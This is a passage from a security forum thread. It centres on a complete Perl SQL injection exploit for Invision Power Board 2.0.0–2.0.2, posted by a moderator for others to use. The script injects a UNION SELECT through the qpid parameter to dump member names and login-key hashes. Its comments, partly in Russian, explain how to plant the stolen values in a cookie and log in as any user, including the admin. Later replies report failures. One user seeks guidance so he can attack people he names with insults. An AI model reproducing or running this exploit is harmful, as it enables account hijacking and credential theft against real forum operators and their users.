Login or Register ::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  :: April 20, 2024 Menu  Home  Logout  Discussions  Forums  Members List  IRC chat  Tools  Base64 coder  MD5 hash  CRC32 checksum  ROT13 coder  SHA-1 hash  URL-decoder  Sql Char Encoder  Affiliates  y3dips ITsec  Md5 Cracker  User Manuals  AlbumNow  Content  Content  Sections  FAQ  Top  Info  Feedback  Recommend Us  Search  Journal  Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9145 People Online: Visitors: 641 Members: 0 Total: 641 PacketStorm News ·301 Moved Permanently read more... IT Security and Insecurity Portal www.waraxe.us Forum Index -> Sql injection -> Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit    View previous topic :: View next topic  Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit Posted: Wed Nov 24, 2004 4:40 pm LINUX Moderator   Joined: May 24, 2004 Posts: 404 Location: Caiman PERL file i test work nice remember only 2.0 to 2.0.2 Code: Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit     #!/usr/bin/perl use IO::Socket; ## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit ## by RusH security team (www.rst.void.ru) ## coded by 1dt.w0lf ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## example: ## ## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ## ------------------------------------------------------------------------------------------------ ## [>] SERVER: 127.0.0.1 ## [>]    DIR: /IPB202/ ## [>]  FORUM: 2 ## [>]  TOPIC: 1 ## [>]    SID: 3edb1eaeea640d297ee3b1f78b5679b3 ## [>] PREFIX: ## [>]     ID: ## ------------------------------------------------------------------------------------------------ ## ## [~] PREPARE TO CONNECT... ## [+] CONNECTED ## [~] SENDING QUERY... ## [+] DONE! ## ## PREFIX: ibf_ ## ## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_ ## ------------------------------------------------------------------------------------------------ ## [>] SERVER: 127.0.0.1 ## [>]    DIR: /IPB202/ ## [>]  FORUM: 2 ## [>]  TOPIC: 1 ## [>]    SID: 3edb1eaeea640d297ee3b1f78b5679b3 ## [>] PREFIX: ibf_ ## [>]     ID: ## ------------------------------------------------------------------------------------------------ ## ## [~] PREPARE TO CONNECT... ## [+] CONNECTED ## [~] SENDING QUERY... ## [+] DONE! ## ## --[ REPORT ]------------------------------------------------------------------------------------ ## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e] ## ------------------------------------------------------------------------------------------------ ## Now you need edit cookie and insert new pass_hash and member_id values. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Пару слов о возвращаемом эксплоитом результате: ## Значение pass_hash это не зашифрованный пароль юзера!!! а одноименное значение из кукиса с ## помощью которого можно войти на форум под любым юзером без ввода пароля. ## member_id это также одноименное значение из кукиса. ## Поэтому не стоит пытаться расшифровать pass_hash =) Просто зарегистрируйтесь на форуме и измените ## pass_hash и member_id в вашем cookie на одно из значений которые выдаст сплоит. ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (@ARGV < 5) { print "-------------------------------------------------------------------------\r\n"; print "       Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n"; print "-------------------------------------------------------------------------\r\n"; print "usage:\r\n"; print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\r\n\r\n"; print "SERVER         - server where IPB installed\r\n"; print "/DIR/          - IPB directory or / for no directory\r\n"; print "FORUM_NUM      - number of existing forum\r\n"; print "TOPIC_NUM      - number of existing topic\r\n"; print "SID            - your session id\r\n"; print "[TABLE_PREFIX] - table prefix in database\r\n"; print "[USER_ID]      - user id for exploiting\r\n\r\n"; print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_\r\n"; print "-------------------------------------------------------------------------\r\n"; exit(); } if (@ARGV < 6) { $get_table = 1; } $server = $ARGV[0]; $dir    = $ARGV[1]; $fnum   = $ARGV[2]; $tnum   = $ARGV[3]; $sid    = $ARGV[4]; $prefix = $ARGV[5]; $id     = $ARGV[6]; print "------------------------------------------------------------------------------------------------\r\n"; print "[>] SERVER: $server\r\n"; print "[>]    DIR: $dir\r\n"; print "[>]  FORUM: $fnum\r\n"; print "[>]  TOPIC: $tnum\r\n"; print "[>]    SID: $sid\r\n"; print "[>] PREFIX: $prefix\r\n"; print "[>]     ID: $id\r\n"; print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path  = $dir; $path .= "index.php?s="; $path .= $sid; $path .= "&act=Post&CODE=02&f="; $path .= $fnum; $path .= "&t="; $path .= $tnum; if ($get_table == 1)  {  $path .= "&qpid=r57"  } else  { $path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58), member_login_key),1,1,1,1,1,1,1,1,1%20from%20"; $path .= $prefix; $path .= "members"; $path .= ($id)?("%20WHERE%20id=$id%20"):("%20"); $path .= "/*";  } print "[~] PREPARE TO CONNECT...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-]  CONNECTION FAILED"; print "[+] CONNECTED\r\n"; print "[~] SENDING QUERY...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n";                                  print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] DONE!\r\n\r\n"; $suc =0; if ($get_table == 1)  {  while ($answer = <$socket>)   {   if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n"; $suc = 1; }   }  if (!$suc) { print "Exploit failed\r\n"; }  exit();  } print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; while ($answer = <$socket>) {  if ($answer =~ /^([^:]*):([^:]*):([a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2] PASS_HASH: [$3]\r\n"; $suc = 1; } } print "------------------------------------------------------------------------------------------------\r\n"; if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and member_id values.\r\n"; exit(); } else { print "Exploit failed\r\n"; }   Posted: Mon Nov 29, 2004 3:47 pm zer0-c00l Advanced user   Joined: Jun 25, 2004 Posts: 72 Location: BRAZIL! i tried some sites, and it dont work :/ Posted: Tue Dec 07, 2004 10:40 am benji Beginner   Joined: Oct 03, 2004 Posts: 3 well i tried to but it didn't work..... _________________ Benji Posted: Sat Feb 19, 2005 7:14 pm DESyFER Beginner   Joined: Feb 19, 2005 Posts: 2 how do I test/use this Posted: Sun Feb 20, 2005 1:44 am LINUX Moderator   Joined: May 24, 2004 Posts: 404 Location: Caiman DESyFER wrote: how do I test/use this you need perl compiler Posted: Sun Feb 20, 2005 12:25 pm DESyFER Beginner   Joined: Feb 19, 2005 Posts: 2 argentino wrote: DESyFER wrote: how do I test/use this you need perl compiler yep, tried it It doesn't seem to work! does it work for you ?? we must be doing something wrong !! Posted: Wed Mar 22, 2006 10:56 pm nooob Beginner   Joined: Mar 23, 2006 Posts: 2 What perl compiler? Please put up a link so i can download it. apprciate that. edit: better somebody guide me through this.. i have knowledge of 10 out of 100. thats why my name is noob. I really need to hack these racist/powerful/hungry bitches. Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit   www.waraxe.us Forum Index -> Sql injection You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT   Page 1 of 1   All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First  Select a forum Security Research by waraxe----------------General discussionHow to fixMetasploit related Hash cracking requests----------------MD5 hashesAll other hashesHash related information http://www.waraxe.us portal----------------SuggestionsCooperation proposals Security bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holes Various software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo Gallery Programming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssembler Reverse engineering----------------Newbies cornerDisassemblingPHP script decode requests Miscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy database Direct Downloads----------------ToolsTutorialsWordlists Recycle Bin----------------Removed messagesOutdated posts   Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.151 Seconds